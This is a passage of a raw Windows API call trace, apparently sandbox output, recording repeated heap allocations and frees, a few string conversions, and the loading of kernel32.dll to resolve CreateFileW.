0x43e2910 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0082.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0082.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0082.046] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0082.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0082.046] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0082.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0082.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0082.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0082.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0082.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0082.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0082.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0082.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0082.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0082.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0082.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0082.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0082.049] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0082.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0082.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0082.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0082.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0082.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0082.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0082.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0082.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4e98 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0082.052] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0082.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0082.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0082.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0082.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.054] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0082.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0c0 [0082.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb0c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0082.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.055] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0082.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 